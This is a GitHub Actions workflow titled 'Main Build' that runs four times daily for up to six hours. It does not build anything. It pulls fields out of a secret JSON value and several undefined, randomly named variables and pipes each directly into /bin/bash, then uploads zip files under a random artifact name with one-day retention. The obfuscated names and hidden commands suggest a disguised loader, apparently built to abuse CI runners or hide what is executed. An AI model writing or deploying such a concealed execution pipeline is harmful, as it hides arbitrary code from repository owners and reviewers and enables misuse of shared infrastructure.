name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '47 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          wuxsj3: ${{ secrets.wuxsj3 }}
        run: |
          printf '%s' "$wuxsj3" | jq -r .qf833 | /bin/bash
          echo $hrwm8510 | jq -r .agpp35 | /bin/bash
          echo $mvmx863 | jq -r .oetpz3 | /bin/bash
          printf '%s' "$qv793" | jq -r .mp61114 | /bin/bash
          printf '%s' "$si5" | jq -r .rxg32 | /bin/bash
          printf '%s' "$z059" | jq -r .vw1 | /bin/bash
          printf '%s' "$thpqh94303" | jq -r .w75 | /bin/bash
          printf '%s' "$gb1" | jq -r .vv5 | /bin/bash
          echo $sel871 | jq -r .xedwi79 | /bin/bash
          printf '%s' "$dz8" | jq -r .ajjet92486 | /bin/bash

      - name: Upload artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: YNhwq7Zs
          path: "*.zip"
          retention-days: 1
